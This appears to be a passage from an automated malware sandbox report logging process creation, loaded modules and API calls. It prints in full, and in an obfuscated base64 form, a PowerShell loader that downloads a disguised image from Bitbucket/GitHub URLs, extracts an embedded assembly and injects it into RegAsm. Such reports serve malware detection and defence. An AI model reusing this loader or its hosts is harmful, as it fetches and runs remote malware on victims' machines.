g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0045245D push esi; ret 8_2_00452466
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A616 push ecx; ret 8_2_0044A629
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C766 push ecx; ret 8_2_0042C779
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044AE78 push eax; ret 8_2_0044AE96
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00404A3B ShellExecuteW,URLDownloadToFileW,8_2_00404A3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_00413168

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00414EED LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_00414EED
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
